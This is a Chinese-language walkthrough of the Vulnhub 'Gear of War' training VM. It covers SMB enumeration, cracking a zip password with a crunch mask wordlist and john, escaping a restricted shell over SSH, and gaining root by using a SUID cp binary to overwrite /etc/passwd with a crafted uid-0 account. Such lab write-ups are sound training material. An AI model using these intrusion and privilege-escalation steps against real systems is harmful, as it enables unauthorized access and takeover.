Gear of War
识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: Finished! | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
- 192.168.56.100 08:00:27:a1:99:30 1 60 PCS Systemtechnik GmbH
- 192.168.56.254 08:00:27:25:35:76 1 60 PCS Systemtechnik GmbH
复制代码 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 22:11 EDT
- Nmap scan report for localhost (192.168.56.254)
- Host is up (0.000094s latency).
- Not shown: 65531 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 09038d1ff8c9d4b443b3c37312ba95e1 (RSA)
- | 256 1ba05f3ea26b225a81c3187e5bfcd2bd (ECDSA)
- |_ 256 181f0cd6e72af55c45cb8d7970314b7a (ED25519)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- |_http-title: Site doesn't have a title (text/html).
- 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
- 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
- MAC Address: 08:00:27:25:35:76 (Oracle VirtualBox virtual NIC)
- Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Host script results:
- |_clock-skew: mean: -2s, deviation: 0s, median: -2s
- | smb2-time:
- | date: 2023-05-01T02:11:52
- |_ start_date: N/A
- |_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
- | smb-security-mode:
- | account_used: guest
- | authentication_level: user
- | challenge_response: supported
- |_ message_signing: disabled (dangerous, but default)
- | smb2-security-mode:
- | 311:
- |_ Message signing enabled but not required
- | smb-os-discovery:
- | OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
- | Computer name: gears_of_war
- | NetBIOS computer name: GEARS_OF_WAR\x00
- | Domain name: \x00
- | FQDN: gears_of_war
- |_ System time: 2023-05-01T02:11:52+00:00
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
复制代码 获得Shell
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ smbclient -L 192.168.56.254
- Password for [WORKGROUP\kali]:
- Sharename Type Comment
- --------- ---- -------
- LOCUS_LAN$ Disk LOCUST FATHER
- IPC$ IPC IPC Service (gears_of_war server (Samba, Ubuntu))
- Reconnecting with SMB1 for workgroup listing.
- Server Comment
- --------- -------
- Workgroup Master
- --------- -------
- LOCUST GEARS_OF_WAR
-
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ smbclient //192.168.56.254/LOCUS_LAN$
- Password for [WORKGROUP\kali]:
- Try "help" to get a list of possible commands.
- smb: \> ls
- . D 0 Thu Oct 17 14:06:58 2019
- .. D 0 Thu Oct 17 09:51:38 2019
- msg_horda.zip N 332 Thu Oct 17 10:53:33 2019
- SOS.txt N 198 Thu Oct 17 14:06:58 2019
- 5190756 blocks of size 1024. 2014200 blocks available
- smb: \> get SOS.txt
- getting file \SOS.txt of size 198 as SOS.txt (96.7 KiloBytes/sec) (average 96.7 KiloBytes/sec)
- smb: \> get msg_horda.zip
- getting file \msg_horda.zip of size 332 as msg_horda.zip (162.1 KiloBytes/sec) (average 129.4 KiloBytes/sec)
- smb: \> pwd
- Current directory is \\192.168.56.254\LOCUS_LAN$\
- smb: \> put test.txt
- NT_STATUS_ACCESS_DENIED opening remote file \test.txt
- smb: \> quit
复制代码
- smb服务不允许上传文件
- 将共享目录的文件下载到Kali Linux到本地
- ─(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ enum4linux 192.168.56.254
- [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
-
- S-1-22-1-1000 Unix User\marcus (Local User)
复制代码 利用enum4linux工具识别目标主机存在marcus用户- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ cat SOS.txt
- This is a message for the Delta Team.
- I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
- i must protect myself, please try to get the password!!
- [@%%,]
- -Hoffman.
复制代码- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ unzip msg_horda.zip
- Archive: msg_horda.zip
- [msg_horda.zip] key.txt password:
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ zip2john msg_horda.zip > hash
- ver 2.0 efh 5455 efh 7875 msg_horda.zip/key.txt PKZIP Encr: TS_chk, cmplen=152, decmplen=216, crc=37552E74 ts=7635 cs=7635 type=8
-
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- 0g 0:00:00:01 DONE (2023-04-30 22:15) 0g/s 9313Kp/s 9313Kc/s 9313KC/s !LUVDKR!..*7¡Vamos!
- Session completed.
-
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --force
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- 0g 0:00:00:01 DONE (2023-04-30 22:16) 0g/s 13280Kp/s 13280Kc/s 13280KC/s !LUVDKR!..*7¡Vamos!
- Session completed.
复制代码 john没有破解出来。
SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ crunch 4 4 -t @%%, > dict
- Crunch will now generate the following amount of data: 338000 bytes
- 0 MB
- 0 GB
- 0 TB
- 0 PB
- Crunch will now generate the following number of lines: 67600
-
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ wc -l dict
- 67600 dict
复制代码 这样就根据作者提示的表达式创建了字典,然后用该字典去破解压缩文件的密码。- ──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ john --wordlist=dict hash
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- r44M (msg_horda.zip/key.txt)
- 1g 0:00:00:00 DONE (2023-04-30 22:40) 16.66g/s 819200p/s 819200c/s 819200C/s r32Y..s90L
- Use the "--show" option to display all of the cracked passwords reliably
- Session completed.
复制代码 很快就破解得到了密码。- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ unzip msg_horda.zip
- Archive: msg_horda.zip
- [msg_horda.zip] key.txt password:
- inflating: key.txt
-
- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ cat key.txt
- "Vamos a atacar a los humanos con toda nuestras hordas,
- por eso puse en prision a el hombre mas peligroso que tenian,
- por lo que sin el son debiles."
- [[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
- -General RAAM.
复制代码 3_d4y应该是某个用户的密码,而前面enum4linxu工具已经扫描出用户名为marcus- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ ssh marcus@192.168.56.254
- The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
- ED25519 key fingerprint is SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78.
- This key is not known by any other names.
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
- marcus@192.168.56.254's password:
- Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
- * Documentation: https://help.ubuntu.com
- * Management: https://landscape.canonical.com
- * Support: https://ubuntu.com/advantage
- System information as of Mon May 1 02:43:25 UTC 2023
- System load: 0.0 Processes: 94
- Usage of /: 58.3% of 4.95GB Users logged in: 0
- Memory usage: 39% IP address for enp0s3: 192.168.56.254
- Swap usage: 0%
- * Canonical Livepatch is available for installation.
- - Reduce system reboots and improve kernel security. Activate at:
- https://ubuntu.com/livepatch
- 48 packages can be updated.
- 0 updates are security updates.
- Last login: Thu Oct 17 18:38:43 2019
- To run a command as administrator (user "root"), use "sudo <command>".
- See "man sudo_root" for details.
- marcus@gears_of_war:~$ id
- uid=1000(marcus) gid=1000(marcus) groups=1000(marcus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
- marcus@gears_of_war:~$ sudo -l
- [sudo] password for marcus:
- Sorry, user marcus may not run sudo on gears_of_war.
- marcus@gears_of_war:~$ ls -alh
- total 40K
- drwxrwxrwx 6 marcus marcus 4.0K Oct 17 2019 .
- drwxr-xr-x 4 root root 4.0K Oct 17 2019 ..
- -rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history
- -rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout
- -rwxrwxrwx 1 marcus marcus 3.7K Apr 4 2018 .bashrc
- drwxrwxrwx 2 marcus marcus 4.0K Oct 16 2019 .cache
- drwxrwxrwx 3 marcus marcus 4.0K Oct 16 2019 .gnupg
- drwxrwxrwx 2 marcus marcus 4.0K Oct 17 2019 jail
- drwxrwxrwx 3 marcus marcus 4.0K Oct 16 2019 .local
- -rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
- marcus@gears_of_war:~$ cat .bash_his-rbash: /dev/null: restricted: cannot redirect output
- bash: _upvars: `-a2': invalid number specifier
- -rbash: /dev/null: restricted: cannot redirect output
- bash: _upvars: `-a0': invalid number specifier
- cat: .bash_his: No such file or directory
- marcus@gears_of_war:~$ cat .bash_history
- history
- su root
- marcus@gears_of_war:~$ cd jail
- -rbash: cd: restricted
- marcus@gears_of_war:~$ which nc
- /bin/nc
复制代码 这应该是受限的shell
用-t ‘bash -noprofile'可绕过限制
cp命令有SUID位
提权
利用cp命令的SUID位进行提权,可以创建密码,然后写入/etc/passwd文件中去- ┌──(kali㉿kali)-[~/Vulnhub/Gearofwar]
- └─$ openssl passwd -6 -salt jason 123456
- $6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
-
复制代码 jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
内容添加到passwd(可以在/tmp目录下完成),然后利用cp命令覆盖原来的/etc/passwd文件- marcus@gears_of_war:/tmp$ cp passwd /etc/passwd
- marcus@gears_of_war:/tmp$ su - jason
- Password:
- root@gears_of_war:~# cd /root
- root@gears_of_war:~# ls -alh
- total 52K
- drwx------ 6 root root 4.0K Oct 17 2019 .
- drwxr-xr-x 24 root root 4.0K Oct 16 2019 ..
- -rw------- 1 root root 216 Oct 17 2019 .bash_history
- -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
- drwx------ 2 root root 4.0K Oct 17 2019 .cache
- -rw-r--r-- 1 root root 13K Oct 17 2019 .flag.txt
- drwx------ 3 root root 4.0K Oct 17 2019 .gnupg
- drwxr-xr-x 3 root root 4.0K Oct 16 2019 .local
- -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
- drwx------ 2 root root 4.0K Oct 16 2019 .ssh
- root@gears_of_war:~# cat .flag.txt
-
-
-
-
-
- .,*,,
- .*(((#((((*,.
- ,*/,,,..*/(((/*/#(.
- .*//*((####(/,,*,/(#(*
- ..,*//((*, ....**/**(##########%#(*,*(#/.
- .*/((#######((*. ..,*..*,,**///*,,,/(################(//*,.
- .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.
- .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.
- ,*(##(#((((/#######%#(###(##################################/((*
- .*((#/*/(/(#############(#######################(#((#(######*((*
- .*((((#####################################(########((######**/*.
- ,/##((###########################################(##########*,(///.
- *(((###%#####################################################(,****,
- .,/(##(#######%%#####%############(#(############################(***,.
- .**(##%##%###(#####((###############%######//,,*/((###################(,...
- ./(##((##%#(##(/(((((##########################/*. *(############%####(,. .
- **(####((###((///####%######################%####(*, ,((###############*
- .,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,.
- ..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*.
- .,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/
- ,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((.
- .,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####*
- .**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####(
- .,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##,
- ,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(*
- ,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(*
- .*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/
- ,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(.
- ./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(*
- .*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/
- ,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#(
- /(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/
- /#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/
- (###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/
- ./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/,
- .*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//.
- .*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/*
- ,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/,
- ,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/////**,.
- .,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/////////***,
- ..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,.
- ,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,.
- *(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,.
- ..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,..
- ...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,.
- ..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,.
- .,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(////*
- .,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**.
- .,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/.
- ..,,********,,((####################(#(///******/*///(((###########%#####%###(/.
- . ,*******/(###################((#################################(###/,
- .,,,/**/##################(#######(#########################((####,
- .*/*/#######################################################(#(.
- .//############((((########(#######################((####((/*.
- . ,(##########(((((((###########################((###(((((((*,
- . .((############((((###(*,,*//*///*//(##%############((//**/*,
- .*(######(#(#######(**, .*(#######((((/(//**,,
- . ,*/#####((((((##/, .*. ./###((((////,.
- .,.,,//#########*.. . ,, /((/(/*,
- . . . ,../(#####(*/ . . ..
- * .. .,/(#*. . .
- .,../#, . . .
- . . .#/ . .
- .. .#/ .
- #/
- . .(/
- . /#
- . ,(. . .
- .. ,(( .
-
-
-
-
- Congratulation you got out of the jail and finish this Episode#1!
- Please share and support me on twitter!
- Twitter: @sir809
- root@gears_of_war:~#
复制代码 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |